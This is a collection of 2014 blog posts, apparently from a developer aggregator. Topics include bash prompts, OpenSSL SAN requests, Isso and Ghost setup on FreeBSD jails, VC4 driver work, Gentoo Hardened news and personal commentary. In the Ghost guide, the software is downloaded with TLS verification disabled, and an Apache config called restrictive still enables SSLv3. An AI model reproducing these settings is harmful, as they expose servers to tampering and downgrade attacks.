When the PROMPT_COMMAND variable is defined, then bash will execute its content (which I declare as a function) to generate the prompt. Inside the function, I obtain the return code of the last command ($?) and then add it to the PS1 variable. This results in the following code snippet inside my ~/.bashrc:

export PROMPT_COMMAND=__gen_ps1
function __gen_ps1() {
  local EXITCODE="$?";
  # Enable colors for ls, etc.  Prefer ~/.dir_colors #64489
  if type -P dircolors >/dev/null ; then
    if [[ -f ~/.dir_colors ]] ; then
      eval $(dircolors -b ~/.dir_colors)
    elif [[ -f /etc/DIR_COLORS ]] ; then
      eval $(dircolors -b /etc/DIR_COLORS)
    fi
  fi
  if [[ ${EUID} == 0 ]] ; then
    PS1="RC=${EXITCODE} \[\033[01;31m\]\h\[\033[01;34m\] \W \$\[\033[00m\] "
  else
    PS1="RC=${EXITCODE} \[\033[01;32m\]\u@\h\[\033[01;34m\] \w \$\[\033[00m\] "
  fi
}
With it, my prompt now nicely shows the return code of the last executed command. Neat.

Edit: Sean Patrick Santos pointed out my utter failure here: this can be accomplished with the PS1 variable directly, without the overhead of PROMPT_COMMAND. Just make sure to properly escape the $ sign, which I of course forgot in my late-night experiments :-(.
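The PS1-only variant he refers to could be sketched like this (a minimal, color-free sketch; the single quotes keep $? from being expanded at assignment time, so bash re-evaluates it each time the prompt is drawn):

```shell
# Minimal sketch of the PS1-only approach (colors omitted).
# Single quotes are essential: with double quotes, $? would be
# expanded once at assignment time instead of at every prompt.
PS1='RC=$? \u@\h \W \$ '
```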

Multi-Domain Certificates My Universe | 2014-08-30 20:51 UTC

In times of scarce IPv4 addresses, multi-domain certificates are becoming ever more important: they make it possible to run virtual HTTPS hosts with different hostnames on the same IP address. For a long time this was impossible, because SSL and TLS exchange and verify the certificate during connection setup, long before the Host header is transmitted at the HTTP protocol level.

Subject Alternative Names (SAN) solve this problem by simply embedding any number of alternative names in a certificate instead of a single Common Name. To create a SAN-based certificate, a suitable request has to be generated; this step is the only stumbling block when creating SAN certificates. The following explains, step by step, how to create such a certificate signing request (CSR) with OpenSSL.

First you need a list of the domains to be included in the certificate. This file is named domains.txt.
Next we need a template for a customized openssl.cnf. For that we use the default configuration shipped with OpenSSL:

mkdir ~/cacert
cd ~/cacert
head -$(( $(grep -n '\[ v3_ca \]' /etc/ssl/openssl.cnf | sed 's/:.*$//g') - 1 )) /etc/ssl/openssl.cnf > openssl.cnf.part1
cat >> openssl.cnf.part1 << EOF
subjectAltName = @alt_names
EOF
tail -$(( $(wc -l /etc/ssl/openssl.cnf | sed 's/[[:space:]].*//g') - $(grep -n '\[ v3_ca \]' /etc/ssl/openssl.cnf | sed 's/:.*$//g') + 1 )) /etc/ssl/openssl.cnf > openssl.cnf.part2
Both template parts should now be reviewed manually and adjusted where necessary. Here is a summary of the most important changes (all to be made in openssl.cnf.part1):

[ CA_default ]
dir = .

[ req ]
default_bits    = 8192  
default_keyfile = key.pem  
req_extensions  = v3_req

[ req_distinguished_name ]
countryName_default = DE  
To automate CSR creation as far as possible (a worthwhile thing with long lists of domain names), we also need a small shell script, saved as


if [ -f "openssl.cnf" ]; then
    cp openssl.cnf openssl-$(date '+%Y%m%d-%H%M%S').cnf
fi
cp openssl.cnf.part1 openssl.cnf

# the DNS.n entries must live in the [ alt_names ] section referenced above
echo "[ alt_names ]" >> openssl.cnf
i=1
while read LINE; do
    echo "DNS.${i} = ${LINE}" >> openssl.cnf
    i=$(( i + 1 ))
    echo "DNS.${i} = *.${LINE}" >> openssl.cnf
    i=$(( i + 1 ))
done < domains.txt
echo >> openssl.cnf
cat openssl.cnf.part2 >> openssl.cnf

openssl req -new -out req-$(date '+%Y%m%d-%H%M%S').pem -key key.pem -config openssl.cnf
Before we can create a CSR, we still need a private key:

openssl genrsa -out key.pem 4096  
A CSR can now be created simply by running the shell script:

The newly generated CSR now resides in the file req-<date>-<time>.pem and can be submitted to a certification authority (CA) such as CAcert for signing. Alternatively, you can of course sign the request yourself, but that requires a bit of infrastructure, and explaining how to set that up would go beyond the scope of this post.
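Whether the alternative names actually ended up in a request can be checked with openssl req -text. Here is a self-contained illustration; the file names and domains are made up, and it uses -addext (OpenSSL 1.1.1 or newer) merely as a stand-in for the config-file approach described above:

```shell
# Create a throwaway key and a SAN request, then inspect it.
openssl genrsa -out demo-key.pem 2048
openssl req -new -key demo-key.pem -subj "/CN=example.org" \
    -addext "subjectAltName=DNS:example.org,DNS:www.example.org" \
    -out demo-req.pem
# The SAN extension should show up in the request:
openssl req -noout -text -in demo-req.pem | grep -A1 "Subject Alternative Name"
```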

Yesterday I fixed a PowerPC issue that had been open for ages; it is an endianness issue, and it is (funnily enough) on the little-endian flavour of the architecture.


I have some ties with this architecture, since my interest in it (and in AltiVec/VMX in particular) is what made me start contributing to MPlayer while fixing issues on Gentoo, and from there hack on the FFmpeg of the time, meet the VLC people, and decide to part ways with Michael Niedermayer and, with the other main contributors of FFmpeg, create Libav. Quite a long way back in time.

Big endian, Little Endian

It is a bit surprising that IBM decided to use little endian (big endian is MUCH nicer for I/O processing such as networking), but they probably have their reasons.

PowerPC has traditionally always been bi-endian, with the ability to switch between the two on the fly (which made managing foreign-endian simulators slightly less annoying), but the primary endianness had always been big.

This brings us to a quite interesting problem: some, if not most, of the PowerPC code had been written with big-endian in mind. Luckily, since most of the code was written using C intrinsics (bless whoever made the AltiVec intrinsics not as terrible as the other ones around), it won't be that hard to recycle most of it.

More will follow.

Private Comments My Universe | 2014-08-30 06:57 UTC

The triumph of Disqus seems unstoppable, even though there is a whole range of privacy concerns: technically, Disqus is nothing more than a web bug which, much like the Facebook web bugs, sends tracking data to the Disqus servers even if you are not registered or logged in with Disqus at all. Even Udo Vetter has now bugged his Lawblog; for all those who use Ghostery to protect their privacy, comments there look like this:

From a website operator's point of view, I can even understand this trend to some extent: despite more or less serious efforts by their developers, the built-in comment systems of Wordpress, Drupal, Serendipity and friends do not offer the same functionality as Disqus, and newer systems such as Ghost, which I use myself, skip implementing their own comment feature entirely in favour of external comment services.

To get it out of the way up front: I cannot pull a fully equivalent Disqus replacement out of my sleeve either. But anyone following this blog will have noticed that commenting on posts is possible here too. Behind the scenes, a self-hosted Isso installation does the work. Its setup is not entirely trivial, though, so I have written down the rough procedure here.

Isso is set up here to serve several different websites, each of which is in turn reachable under several different URIs (e.g. via HTTP and HTTPS). uWSGI is used as the foundation. Unfortunately, even on FreeBSD, Isso cannot be installed from the ports tree and has to be installed directly via pip instead. If you are working in a dedicated jail you can safely do that; otherwise, please be sure to use virtualenv!

pkg ins uwsgi py27-pip py27-sqlite3  
pip install isso  
mkdir -p /usr/local/www/isso  
mkdir -p /usr/local/www/uwsgi  
mkdir -p /usr/local/etc/isso  
mkdir -p /var/log/isso  
touch /var/log/isso/uwsgi.log  
touch /var/log/isso/isso.log  
chown www:www /var/log/isso/isso.log  
chgrp www /usr/local/www/isso  
chgrp www /usr/local/www/uwsgi  
chmod 0770 /usr/local/www/isso  
chmod 0770 /usr/local/www/uwsgi  
All required programs and directories are now in place. Individual websites can now be configured for Isso simply by dropping a suitable .ini file into /usr/local/etc/isso/:

name = dummy  
dbpath = /usr/local/www/isso/dummy.db  
host =
The name parameter is only set here to make the Isso installation fit for use on several different websites. Isso then provides its API under name-specific URIs, such as <name>/ (see also here). Examples of more complex configurations, for instance with email notification and moderation, can be found in Isso's documentation.

All that is missing now is a matching uWSGI configuration. It is stored as /usr/local/etc/uwsgi.ini and looks roughly like this:

http =  
master = true  
processes = 4  
cache2 = name=hash,items=1024,blocksize=32  
spooler = /usr/local/www/uwsgi  
module = isso.dispatch  
env = ISSO_SETTINGS=/usr/local/etc/isso/dummy.ini;/usr/local/etc/isso/ghost.ini  
logto = /var/log/isso/uwsgi.log  
logto2 = /var/log/isso/isso.log  
ISSO_SETTINGS takes a list of configuration files that actually exist, so be sure to adapt this line to your own setup!

To start Isso via uWSGI, uWSGI still has to be registered in rc.conf:

cat >> /etc/rc.conf << EOF
uwsgi_enable="YES"
uwsgi_flags="-M /usr/local/etc/uwsgi.ini"
EOF
service uwsgi start  
Integrating Isso into your own website works much like integrating Disqus. The script is generated and served dynamically by Isso itself and merely has to be included:

data-isso-css="false" means you have to build and include a suitable stylesheet yourself; for me, however, that is a must if Isso is to blend at least halfway into the design of your own website.
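The include itself is a single script tag served by Isso; a minimal sketch, with host and Isso name purely as examples (compare the Isso documentation):

```
<script data-isso="//comments.example.org/dummy/"
        data-isso-css="false"
        src="//comments.example.org/dummy/js/embed.min.js"></script>
```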

For a page to display its comments, it is enough to add a container with the id isso-thread; the included script takes care of the rest.

<section id="isso-thread"></section>  
Finally, a few things that make running and using Isso reasonably comfortable:

  • Use your own stylesheet. The default stylesheet is guaranteed not to match your website and will make the Isso comment threads look odd.
  • Put Isso behind a reverse proxy, ideally with caching for the JavaScript (but only for that). Use the proxy to serve Isso over HTTPS; that is simply good form, especially when Isso is used on pages that are themselves served over HTTPS.
  • Configure Isso to notify you about new comments by email. Mailgun is an excellent choice here if you do not run your own mail server. Every mail also contains a link that lets you delete the comment again.
For the webmaster, Isso is still not really as comfortable as Disqus, but at least your visitors' privacy is preserved; and by the way, Ghostery has nothing against Isso either…

Haunted Castle My Universe | 2014-08-29 21:01 UTC

From an author's point of view, Ghost is a great thing. For the admin, however, it is not entirely trivial to install, configure and, above all, harden Ghost so that it is fit for production use. This is exactly where the documentation unfortunately still has some gaps, so here is a description of how to put Ghost on a stable and secure footing.

In the age of IPv6 there is really no good reason left to serve websites unencrypted. The server load caused by SSL (by now really TLS) is negligible in most cases; in return, HTTPS solves some (but not all!) privacy problems. The Ghost backend in particular should absolutely be secured with HTTPS to put a stop to the theft of login credentials.


Ultimately, any Unix-like system is suitable for running Ghost, provided node.js can be installed and configured on it. I myself value FreeBSD highly for server use; ZFS, jails and the pf packet filter in particular form a well-rounded package that allows even little-tested applications like Ghost to be run in a fairly secure environment.

Installing and configuring FreeBSD is not the subject of this blog post, though; whole books could be written about that. Just this much: in the following, I assume that Ghost, the database and the reverse proxy each live in separate jails.


SQLite is a perfectly usable database for test setups. In a production environment, however, SQLite by design reaches its limits fairly quickly when it comes to handling larger loads. PostgreSQL is a very mature, well-proven and extremely capable relational database server, and Ghost works wonderfully with it.

The only thing to keep in mind during installation is that PostgreSQL only works in a jail if that jail is allowed to use the System V IPC primitives. The jail configuration of the database jail could therefore look something like this:

postgresql {
    host.hostname = "postgresql.local";
    path = "/var/jail/postgresql";
    ip4.addr = "";
    ip6.addr = "2001:db8::2/32";
    allow.sysvipc = 1;
}
Installing PostgreSQL in the FreeBSD jail is quite painless:

pkg ins postgresql93-server

# login class for the postgres account, as suggested by the FreeBSD port
cat >> /etc/login.conf << 'EOF'
postgres:\
	:lang=en_US.UTF-8:\
	:setenv=LC_COLLATE=C:\
	:tc=default:
EOF

cap_mkdb /etc/login.conf

cat >> /etc/rc.conf << EOF
postgresql_enable="YES"
EOF

/usr/local/etc/rc.d/postgresql initdb

cat >> /usr/local/pgsql/data/pg_hba.conf << EOF
host    all             all                 md5
host    all             all             2001:db8::/32               md5
EOF

service postgresql start  
Now all that's missing is a database, and of course a user for Ghost:

su - pgsql  
createuser -D -R -P ghost  
createdb ghost  
A simple test to see whether everything worked:

psql -U ghost  
If no error occurs and the prompt ghost=> is displayed, everything worked.


Ghost itself can likewise be installed in a jail. Node.js from the FreeBSD ports can (currently) be used without concern. Supervisor is used here to start and monitor the Ghost process. To be able to install pg via npm, however, a few missing symlinks have to be created.

pkg ins node npm postgresql93-client gmake py27-supervisor  
cd /usr/local/bin  
ln -s /usr/bin/c++ CXX  
ln -s /usr/bin/c++ g++  
setenv PYTHON /usr/local/bin/python2  
cd /root  
fetch --no-verify-hostname --no-verify-peer  
mkdir -p /usr/local/www/ghost  
cd /usr/local/www/ghost  
unzip /root/  
cp config.example.js config.js  
cd /usr/local/www/ghost/content  
chown -R www:www data images  
The file config.js now needs a little editing, so that the section for the production system ends up looking something like this:

production: {
    url: '',
    mail: {
        transport: 'SMTP',
        fromaddress: '',
        options: {
            service: 'Mailgun',
            auth: {
                user: '',
                pass: '12345abcde'
            }
        }
    },
    database: {
        client: 'pg',
        connection: {
            host     : '',
            user     : 'ghost',
            password : 'secret',
            database : 'ghost',
            charset  : 'utf8'
        }
    },
    server: {
        host: '',
        port: '2368'
    }
}
To finish the Ghost installation, only a few more steps are needed:

cd /usr/local/www/ghost  
npm install pg  
npm install --production

cat >> /usr/local/etc/supervisord.conf << EOF
[program:ghost]
command = /usr/local/bin/node /usr/local/www/ghost/index.js
directory = /usr/local/www/ghost
user = www
autostart = True
autorestart = True
stdout_logfile = /var/log/ghost.log
stderr_logfile = /var/log/ghost_err.log
environment = NODE_ENV="production"
EOF

cat >> /etc/rc.conf << EOF
supervisord_enable="YES"
EOF

service supervisord start  

Reverse Proxy

Ghost can in theory be run stand-alone; however, only a reverse proxy in front of it makes it possible to serve the website over HTTPS, and, as a bonus, to speed up content delivery through caching.

Many setups nowadays suggest Nginx as the reverse proxy. With all the hype around Nginx, it is often overlooked that the Apache web server allows much finer-grained control, especially when it comes to configuring a reverse proxy. And incidentally, while the performance differences are still measurable, since the introduction of the event MPM they have no real practical relevance outside large high-performance setups.

On FreeBSD, Apache can easily be installed as a package, but it then comes with the outdated prefork MPM. If you want to enjoy the more modern event MPM, there is no way around building it yourself:

cd /usr/ports/www/apache24  
make config  
make config-recursive  
make install clean  
To make sure the required modules are loaded, the following entries should be active in the file /usr/local/etc/apache24/httpd.conf:

LoadModule cache_module libexec/apache24/  
LoadModule cache_disk_module libexec/apache24/  
LoadModule proxy_module libexec/apache24/  
LoadModule proxy_http_module libexec/apache24/  
LoadModule ssl_module libexec/apache24/  
LoadModule rewrite_module libexec/apache24/  
The configuration for the virtual hosts can also be added to this file (at the end). However, I find it cleaner to move it into separate files that are included via IncludeOptional. As an example, here is a configuration with IPv6; IPv4 can of course be set up analogously:

<VirtualHost [2001:db8::1]:80>  
    ErrorLog /var/log/ghost-error.log
    CustomLog /var/log/ghost-access.log combined

    RewriteEngine on
    RewriteRule ^/(.*) https://%{HTTP_HOST}/$1 [L,R=permanent]

    ProxyRequests Off
    <Proxy *>
        Require all denied
    </Proxy>
</VirtualHost>

<VirtualHost [2001:db8::1]:443>  
    ErrorLog /var/log/ghost-error-ssl.log
    CustomLog /var/log/ghost-access-ssl.log "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %>s %b \"%{cache-status}e\" \"%{User-Agent}i\""

    SSLEngine On
    SSLProtocol -ALL +SSLv3 +TLSv1 +TLSv1.1 +TLSv1.2
    SSLHonorCipherOrder on
    SSLCompression off
    SSLCertificateFile "/usr/local/etc/ssl/cert/server-cert.pem"
    SSLCertificateKeyFile "/usr/local/etc/ssl/keys/server-key.pem"
    SSLCertificateChainFile "/usr/local/etc/ssl/ca/server-ca.pem"
    Header add Strict-Transport-Security "max-age=15768000"
    ServerSignature Off

    RequestHeader set X-Forwarded-Proto "https" early

    ProxyTimeout 25
    ProxyRequests Off
    ProxyPass /
    ProxyPassReverse /
    ProxyPreserveHost On

    UseCanonicalName On
    CacheRoot /usr/local/www/proxy
    CacheDirLevels 2
    CacheDirLength 5
    CacheMaxFileSize 33554432
    CacheQuickHandler on
    CacheDefaultExpire 3600
    CacheMaxExpire 1209600
    CacheMinExpire 1800
    CacheIgnoreNoLastMod On
    CacheIgnoreQueryString On
    CacheIgnoreHeaders Set-Cookie
    CacheIgnoreURLSessionIdentifiers v
    CacheStaleOnError on
    CacheHeader on 
    CacheEnable disk /
    <LocationMatch "^/ghost/">
        CacheDisable on
    </LocationMatch>
</VirtualHost>
The configuration for the virtual HTTP host merely forwards requests to the virtual HTTPS host by rewriting the URL. Unlike with RedirectPermanent, this preserves the original hostname in the request header.

The actual work is done by the virtual HTTPS host: besides restrictive SSL settings, it uses the ProxyPass directive to fetch the requested content from Ghost and return it to the requester. Where possible, though, requests are first served from the cache, even if Ghost happens to be down at that moment. The backend (under /ghost) is of course exempt from this: Ghost itself sends correct cache headers, but to be on the safe side, URLs beginning with /ghost/ are excluded from caching.

Important: Ghost requires the HTTP header X-Forwarded-Proto with the value https. Since Ghost itself does not support HTTPS, this is the only way for Ghost to determine that the request was protected by the HTTPS protocol at least as far as the reverse proxy. If this request header is not set but Ghost is configured with an https:// URI, redirects are generated continuously, which the reverse proxy in turn answers with another redirect, so the browser runs in circles until it times out or notices the circular reference and gives up.
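The loop described above is easy to model. The sketch below is a simplified illustration (not Ghost's actual code; blog.example.com is a placeholder) of how a missing X-Forwarded-Proto header turns every request into yet another redirect:

```shell
# Ghost's decision, reduced to its essence: with an https:// site URL
# configured, a request is only answered normally if it carries
# X-Forwarded-Proto: https; otherwise Ghost redirects to the https URL,
# which the proxy forwards again without the header, and so on.
ghost_response() {
    xfp="$1"    # value of the X-Forwarded-Proto request header, "" if unset
    if [ "$xfp" = "https" ]; then
        echo "200 OK"
    else
        echo "301 Location: https://blog.example.com/"
    fi
}

ghost_response "https"   # proxy sets the header: normal answer
ghost_response ""        # header missing: the redirect carousel starts
```

With the `RequestHeader set X-Forwarded-Proto "https" early` directive from the vhost above in place, only the first branch is ever taken.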

Before Apache can be started, the cache directory still has to be prepared. Unlike the log files, it must belong to the user Apache runs as, because files are opened and closed dynamically at runtime, and thus also after Apache has dropped its root privileges.

mkdir -p /usr/local/www/proxy  
chown www:www /usr/local/www/proxy  
chmod 0750 /usr/local/www/proxy  
To keep the cache directory from overflowing at some point, the helper program htcacheclean can be used; it is installed automatically along with Apache. Conveniently, an RC script is already included, so only rc.conf has to be edited:

cat >> /etc/rc.conf << EOF
apache24_enable="YES"
htcacheclean_enable="YES"
EOF

service apache24 start  
service htcacheclean start  
That should be it. Now just point your browser at the site and hope that the registration page appears…

helping out with VC4 anholt's lj | 2014-08-29 20:33 UTC

I've had a couple of questions about whether there's a way for others to contribute to the VC4 driver project.  There is!  I haven't posted about it before because things aren't as ready as I'd like for others to do development (it has a tendency to lock up, and the X implementation isn't really ready yet so you don't get to see your results), but that shouldn't actually stop anyone.

To get your environment set up, build the kernel ( vc4 branch), Mesa (git:// ) with --with-gallium-drivers=vc4, and piglit (git:// ).  For working on the Pi, I highly recommend having a serial cable and doing NFS root so that you don't have to write things to slow, unreliable SD cards.

You can run an existing piglit test that should work, to check your environment: env PIGLIT_PLATFORM=gbm VC4_DEBUG=qir ./bin/shader_runner tests/shaders/glsl-algebraic-add-add-1.shader_test -auto -fbo -- you should see a dump of the IR for this shader, and a pass report.  The kernel will make some noise about how it's rendered a frame.

Now the actual work:  I've left some of the TGSI opcodes unfinished (SCS, DST, DPH, and XPD, for example), so the driver just aborts when a shader tries to use them.  How they work is described in src/gallium/docs/source/tgsi.rst. The TGSI-to-QIR code is in vc4_program.c (where you'll find all the opcodes that are implemented currently), and vc4_qir.h has all the opcodes that are available to you and helpers for generating them.  Once it's in QIR (which I think should have all the opcodes you need for this work), vc4_qpu_emit.c will turn the QIR into actual QPU code like you find described in the chip specs.

You can dump the shaders being generated by the driver using VC4_DEBUG=tgsi,qir,qpu in the environment (that gets you 3/4 stages of code dumped -- at times you might want some subset of that just to quiet things down).

Since we've still got a lot of GPU hangs, and I don't have reset working, you can't even complete a piglit run to find all the problems or to test your changes to see if your changes are good.  What I can offer currently is that you could run PIGLIT_PLATFORM=gbm VC4_DEBUG=norast ./ tests/ results/vc4-norast; --overwrite summary/mysum results/vc4-norast will get you a list of all the tests (which mostly failed, since we didn't render anything), some of which will have failed assertions.  Now that you know which tests were assertion failing from the opcode you worked on, you can run them manually, like PIGLIT_PLATFORM=gbm /home/anholt/src/piglit/bin/shader_runner /home/anholt/src/piglit/generated_tests/spec/glsl-1.10/execution/built-in-functions/vs-asin-vec4.shader_test -auto (copy-and-pasted from the results) or PIGLIT_PLATFORM=gbm PIGLIT_TEST="XPD test 2 (same src and dst arg)" ./bin/glean -o -v -v -v -t +vertProg1 --quick (also copy and pasted from the results, but note that you need the other env var for glean to pick out the subtest to run).

Other things you might want eventually: I do my development using cross-builds instead of on the Pi, install to a prefix in my homedir, then rsync that into my NFS root and use LD_LIBRARY_PATH/LIBGL_DRIVERS_PATH on the Pi to point my tests at the driver in the homedir prefix.  Cross-builds were a *huge* pain to set up (debian's multiarch doesn't ship the .so symlink with the library, and the -dev packages that do install them don't install simultaneously for multiple arches), but it's worth it in the end.  If you look into cross-building, what I'm using is rpi-tools/arm-bcm2708/gcc-linaro-arm-linux-gnueabihf-raspbian-x64/bin/arm-linux-gnueabihf-gcc and you'll want --enable-malloc0returnsnull if you cross-build a bunch of X-related packages.

Another month has passed, so we had another online meeting to discuss the progress within Gentoo Hardened.

Lead elections

The yearly lead elections within Gentoo Hardened were up again. Zorry (Magnus Granberg) was re-elected as project lead so doesn’t need to update his LinkedIn profile yet ;-)


blueness (Anthony G. Basile) has been working on the uclibc stages for some time. Due to the configurable nature of these setups, many /etc/portage files were provided as part of the stages, which shouldn't happen. Work is underway to update this accordingly.

For the musl setup, blueness is also rebuilding the stages to use a symbolic link to the dynamic linker (/lib/ as recommended by the musl maintainers.

Kernel and grsecurity with PaX

A bug has been submitted which shows that large binary files (in the bug, a chrome binary with debug information is shown to be more than 2 GB in size) cannot be pax-marked, with paxctl informing the user that the file is too big. The problem occurs when the PaX marks are in ELF (as the application mmaps the binary) – users of extended attributes based PaX markings do not have this problem. blueness is working on making things a bit more intelligent, and to fix this.


I have been making a few changes to the SELinux setup:

  • The live ebuilds (those with version 9999 which use the repository policy rather than snapshots of the policies) are now being used as “master” in case of releases: the ebuilds can just be copied to the right version to support the releases. The release script inside the repository is adjusted to reflect this as well.
  • The SELinux eclass now supports two variables, SELINUX_GIT_REPO and SELINUX_GIT_BRANCH, which allows users to use their own repository, and developers to work in specific branches together. By setting the right value in the users’ make.conf switching policy repositories or branches is now a breeze.
  • Another change in the SELinux eclass is that, after the installation of SELinux policies, we will check the reverse dependencies of the policy package and relabel the files of these packages. This allows us to only have RDEPEND dependencies towards the SELinux policy packages (if the application itself does not otherwise link with libselinux), making the dependency tree within the package manager more correct. We still need to update these packages to drop the DEPEND dependency, which is something we will focus on in the next few months.
  • In order to support improved cooperation between SELinux developers in the Gentoo Hardened team – perfinion (Jason Zaman) is in the queue for becoming a new developer in our midst – a coding style for SELinux policies is being drafted. This is of course based on the coding style of the reference policy, but with some Gentoo specific improvements and more clarifications.
  • perfinion has been working on improving the SELinux support in OpenRC (release 0.13 and higher), making some of the additions that we had to make in the past – such as the selinux_gentoo init script – obsolete.
The meeting also discussed a few bugs in more detail, but if you really want to know, just hang on and wait for the IRC logs ;-) Other usual sections (system integrity and profiles) did not have any notable topics to describe.

Readers of my blog for a while probably know already that I've been an Apple user over time. What is not obvious is that I have scaled down my (personal) Apple usage over the past two years, mostly because of my habits, and partly because of Android and Linux getting better and better. One component is, though, that some of the advantages of using Apple started to disappear for me.

I think that for me the start of the problems is to be found in the release of iOS 7. Besides not being to my taste, the new flashy UI did not perform as well as previous releases; I think others have had the same experience. In particular the biggest problem with it for me had to do with the way I started using my iPad while in Ireland. Since I now have access to a high-speed connection, I started watching more content in streaming. In particular, thanks to my multiple trips to the USA over the past year, I got access to more video content on the iTunes store, so I wanted to watch some of the new TV series through it.

Turned out that for a few versions, and I mean a few months, iOS was keeping the streamed content in the cache, not accounting for it anywhere, and never cleaning it up. The result was that after streaming half a series, I would get errors telling me the iPad storage was full, but there was no way from the device itself to clear the cache. Either you had to do a factory reset to drop all the content off the device, or you had to use a Windows application to remove the cache files manually. Not very nice.

Another very interesting problem with streaming content: it can be slow. Not always, but it can. One night I wanted to watch The LEGO Movie, since I did not see it at the cinema. It's not available on the Irish Netflix, so I decided to rent it off iTunes. It took the iPad four hours to download it. It made no sense. And no, the connection was not hogged by something else, and running a SpeedTest from the tablet itself showed it had all the network capacity it needed.

The iPad is not, though, the only Apple device I own; I also bought an iPod Touch back in LA when my Classic died, even though I was not really happy with downgrading from 80G down to 64G. But it's mostly okay, as my main use for the iPod is to listen to audiobooks and podcasts when I sleep — which recently I have been doing through Creative D80 Bluetooth speakers, which are honestly not great but at least don't force me to wear earphones all night long.

I had no problem before switching the iPod from one computer to the next, as I moved from iMac to a Windows disk for my laptop. When I decided to just use iTunes on the one Windows desktop I keep around (mostly to play games), then a few things stopped working as intended. It might have been related to me dropping the iTunes Match subscription, but I'm not sure about that. But what happens is that only a single track for each of the albums was being copied on the iPod and nothing else.

I tried factory reset, cable and wireless sync, I tried deleting the iTunes data on my computer to force it to figure out the iPod is new, and the current situation I'm in is only partially working: the audiobooks have been synced, but without cover art and without the playlists — some of the audiobooks I have are part of a series, or are split in multiple files if I bought them before Audible started providing single-file downloads. This is of course not very good when the audio only lasts three hours, and then I start having nightmares.

It does not help that I can't listen to my audiobooks with VLC for Android, because it thinks that the chapter art is a video stream, and thus puts the stream on pause as soon as I turn off the screen. I should probably write a separate rant about the lack of proper audiobook tools for Android. Audible has an app, but it does not allow you to sideload audiobooks (i.e. stuff I ripped from my original CDs, or that I bought on iTunes), nor does it allow you to build a playlist of books, say for all the books in a series.

As I write this, I asked iTunes again to sync all the music to my iPod Touch as 128kbps AAC files (as otherwise it does not fit into the device); iTunes is now copying 624 files; I'm sure my collection contains more than 600 albums — and I would venture to say more than half I have in physical media. Mostly because no store allows me to buy metal in FLAC or ALAC. And before somebody suggests Jamendo or other similar services: yes, great, I actually bought lots of Jazz on Magnatune before it became a subscription service and I loved it, but that is not a replacement for mainstream content. Also, Magnatune has terrible security practices, don't use it.

Sorry Apple, but given these small-but-not-so-small issues with your software recently, I'm not going to buy any more devices from you. If any of the two devices I have fails, I'll just get someone to build a decent audiobook software for me one way or the other…

Some time ago I discovered the video series "Tropes vs Women in Video Games" created by Anita Sarkeesian. I found these videos very interesting as they show in an entertaining way how women are depicted in pop culture in general and in video games specifically.

Unfortunately, Anita has faced online harassment since the start of the Kickstarter campaign for Tropes vs Women in Video Games. It seems like some people feel threatened by someone who just wants to expose how the entertainment industry presents women in movies and video games (the "damsel in distress" trope is the most common one, which probably everyone has seen in a movie or game). To make it very clear: Anita does not campaign for any video games to be abolished. She just shows how many (or even most) video games present a distorted image of women. Obviously, the gaming industry itself suffers from this fact, because many gamers (regardless of gender) are annoyed by the lack of strong female characters in most video games. In acknowledgement of her work, Anita received the 2014 Game Developers Choice Ambassador Award.

Over the last few days, a yet unknown person harassed Anita on Twitter in an unprecedented way: the person not only insulted her but actually threatened to murder her and her family. The reactions to these threats are nearly as disturbing as the threats themselves: in the discussion boards of Heise Online (German only), many people argue that there is no systematic discrimination against women in the IT industry. However, even if one ignores the current example (and argues that Anita is not part of this industry), women are obviously discriminated against in our industry: I recommend reading an interesting article written by the founder of a Silicon Valley based startup trying to find investors: many of those investors are more interested in her than in her business, and it is more routine than exception that they hit on her, even when she shows clearly that she is not interested.

We should all reflect on how we treat women in our industry, and people like Anita Sarkeesian help us in doing so. Therefore, today I donated some money to her project "Feminist Frequency". I had already planned this for a long time, but the most recent events made sure that I did not wait any longer. When, if not in these troubling times, is the right time to show support? I can only ask everyone in the IT industry to also think about how we treat women and to support those who are courageous and speak up.

Will Backman has just posted his interview with Ken Moore about the new Lumina desktop environment on the bsdtalk website.  The podcast is only 28 minutes long and goes into some of the history/motivation/philosophy of the project.

Because of its initial internet fixation (early firmware would only play media whose URLs were reachable on the internet), the rumor stubbornly persists that the Chromecast is not suitable for local media streaming. It is easy to convince yourself of the opposite: simply put an MKV file with h.264 video and MP3 audio on your home web server, make sure this file is delivered with the MIME type "video/mp4", then deploy the minimal demo app on the web server and open the page in Chrome. Now "Big Buck Bunny" and friends can be streamed to the Chromecast. Conveniently, the demo app has an input field into which you can enter the URL of the MKV mentioned above, et voilà: Chromecast plays local files!
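The MIME-type requirement can be covered with a one-line web-server setting. Assuming Apache as the home web server (the post does not name one, so this is an assumption), a config fragment like the following would do; other servers have equivalent knobs:

```apacheconf
# deliver Matroska files with a MIME type the Chromecast demo app accepts
AddType video/mp4 .mkv
```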

To make the whole thing a bit more comfortable, I did some scripting based on the second demo app, which comes with a player: first a Ruby script that scans a directory tree for .mkv and .mp4 files and builds a (static) HTML page from them. Then I adapted the JavaScript code so that it reads out clicked links, and the simple web frontend for sending videos from a NAS or home server to the Chromecast is done.
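The linked scripts are not reproduced here, but the generator's job can be sketched in a few lines of shell (a rough stand-in for the Ruby original; paths and markup are assumptions):

```shell
#!/bin/sh
# Walk a directory tree, collect .mkv/.mp4 files, and emit a static HTML
# list; the accompanying JavaScript then reads out whichever link is
# clicked and hands its URL to the Chromecast player.
media_index() {
    root="$1"
    echo "<html><body><ul>"
    find "$root" -type f \( -name '*.mkv' -o -name '*.mp4' \) | sort |
    while IFS= read -r f; do
        rel="${f#$root/}"     # path relative to the media root
        printf '<li><a href="/%s">%s</a></li>\n' "$rel" "$rel"
    done
    echo "</ul></body></html>"
}

media_index "${1:-.}"         # print the page to stdout
```

Run against the media directory on the web server and redirect the output to a file the server delivers, e.g. `media_index /data/media > index.html`.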

If you are interested in the scripts, you can find them here:

If you want to help: what I would appreciate most are well-thought-out mockups for an overhaul of the interface!

PS: After browsing the docs, it is clear that MPEG2-TS works as well. With that, I'll have to see how I can get live streams from TVheadend to the Chromecast.

Experienced geeks will already know this; narrow-gauge geeks like me perhaps not.

So what do you do?

Once you have figured it out, document it in your own blog so you can find it again.

What is this about?

Actually, a common problem when scripting with bash.

You have a string (a file name, a path name, or similar) and need to modify it, search it, split it, and so on.

The example script shows that this can be done with bash built-in functions alone.

Since the syntax highlighter (and even the bare pre tag) cannot cope with the << here document, I have uploaded the small example script instead.
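Since the example script is only linked, here is a small sketch of the kind of built-in string handling the post is about (bash parameter expansion; the sample path is made up):

```shell
#!/bin/bash
# String surgery with bash built-ins only -- no sed, awk, or cut needed.
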